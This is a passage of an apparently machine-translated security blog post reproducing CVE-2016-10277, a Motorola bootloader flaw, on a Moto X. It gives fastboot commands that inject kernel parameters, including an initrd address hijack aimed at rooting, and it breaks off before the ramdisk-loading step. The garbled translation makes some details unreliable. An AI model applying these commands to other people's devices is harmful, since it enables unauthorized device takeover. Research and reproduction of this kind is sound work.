CVE-2016-10277 in MOTO X Mobile phone on the exploit practice-vulnerability warning-the black bar safety net

CVE-2016-10277 is present in the Motorola series phones bootloader high-risk vulnerabilities, you can by kernel command injection hijacking the phone startup process, loads the attacker’s control of the initramfs, so as to achieve the root mention the right purpose. Our hands on just to have a Motorola MOTO X Phone, then refer to[1]The exploit process, the CVE-2016-10277 exploit the process of Practice A, The reproduction process is still very tortuous.
0×00 system environment

1. Phone: MOTO X(XT1581)
2. System firmware version: XT1581_KINZIE_RETCN_DS_5. 1. 1_LPK23. 229, not root
3. Android version: 5.1.1
   In the exploit process need to use the phone boot. img to the aboot, the initramfs, the phone does not have root words are unable to extract the system firmware, but luckily we found online at the corresponding system firmware can be extracted directly.
   0×01 vulnerability principles
   CVE-2016-10277 basic principle is not complicated, mainly through fastboot to bootloader to inject the kernel command parameters. First of all, we can through the fastoot oem-config to view the configuration parameters:
   ! [](/Article/UploadPic/2017-6/20176268372521. png? www. myhack58. com)
   These parameters are not protected, even if the bootloader is locked, you can still by fastboot oem config command configuration:
   ! [](/Article/UploadPic/2017-6/20176268372335. png? www. myhack58. com)
   The vulnerability is that the bootloader is not on the configuration of these parameters are filtered, and these parameters will be passed directly to the kernel command line. Kernel command line parameters of the injection will affect the bootloader in the loading process, the attacker if the carefully constructed some of the parameters that will achieve control of the phone to start, even root to mention right to the purpose.
   0×02 vulnerability verification
   First, we need to first determine the MOTO X is affected by CVE-2016-10277 vulnerability.

1. the injection parameters set the property
   Perform the command:
   fastboot oem config fsg-id “a androidboot. bar=1”
   ! [](/Article/UploadPic/2017-6/20176268372700. png? www. myhack58. com)
   The command is injected into the androidboot. bar=1 parameter, the parameter if the injection is successful, will set the system ro. the boot. bar property to 1. Of course,here we just made up a bar attribute.
2. start the system view property
   Perform the command:
   fastoot continue
   adb shell getprop is ro. the boot. bar
   ! [](/Article/UploadPic/2017-6/20176268372268. png? www. myhack58. com)
   You can see the successfully set System Properties, the description of the kernel command line parameter injection is successful, determining that the MOTO X is affected by CVE-2016-10277 vulnerability.
   0×03 exploit
   By the vulnerability of command-line injection, we can to the kernel command line injection a number of parameters, and these parameters will in OS the startup phase more than one place to be referenced, and therefore the vulnerability of the attack surface is very wide, here we mainly try to Can the vulnerability be root to mention right. We first briefly introduce the phone startup process, find one of the use points.
3. Android phone of the Secure Boot process
   MOTO series phone most of the use of the high-pass chip, and the Qualcomm chip phones generally start the process as follows:
   [Primary Bootloader (PBL)]
   -. [Secondary Bootloader (SBL)] -.
   [Applications Bootloader (ABOOT)]
   -. [{boot,recovery}. img] |-- Linux Kernel – initramfs
   `-.
   [system. img]
   Phone after boot, the first boot is the bootloader, and the bootloader also roughly divided into 3 stages, the first to start is PBL, then SBL, ABOOT, and finally through the ABOOT from the boot. img or the recovery. img load the linux kernel and the initramfs into the system loading phase. initramfs is a RAM file system, the bootloader will generally be from a fixed memory address in the load, after the system startup will mount the rootfs, i.e., the root directory/is. the initramfs contains a lot of important files, including system startup after the first user mode process init, services startup script init. rc, the selinux policy file for sepolicy, the adbd program, etc. If we can let the system start to load when we construct the initramfs, then we can in here, do a lot of the hijacking operation. And CVE-2016-10277 a the attack surface is by injection kernel command parameters to control the phone boot when initramfs load address, load we specify the initramfs in.
4. through the parameters of the injection hijacking the initramfs is loaded
   By CVE-2016-10277 vulnerability we can to the kernel injected into the initrd parameter, which controls the initramfs memory load address, the parameter form is as follows:
   initrd=,
   First, we test whether you can hijack the initramfs the loaded address, the command is as follows:
   fastboot oem config fsg-id “a initrd=0x12341234,1024”
   fastboot continue
   ! [](/Article/UploadPic/2017-6/20176268372776. png? www. myhack58. com)
   After executing the command we found the phone goes into an infinite loop start, cannot enter the system, The phone has crashed, the description of the initrd parameter plays a role. In order to verify the success of the hijacking of the initramfs is loaded, we also need to find available in the initramfs, and found to the memory and the injection can be controlled initramfs method.
   Due to the different phone system firmware is not the same, the initramfs is not available, we only through online download the corresponding System Firmware to extract the initramfs from. Download the firmware, after decompression to find the boot. img using imgtool tool to extract kernel documentation:
   ! [](/Article/UploadPic/2017-6/20176268372392. png? www. myhack58. com)
   Here’s the ramdisk that is, we want to find the initramfs is. Next we want to approach to memory into our ramdisk, using the following command:

[1] [2] [3] next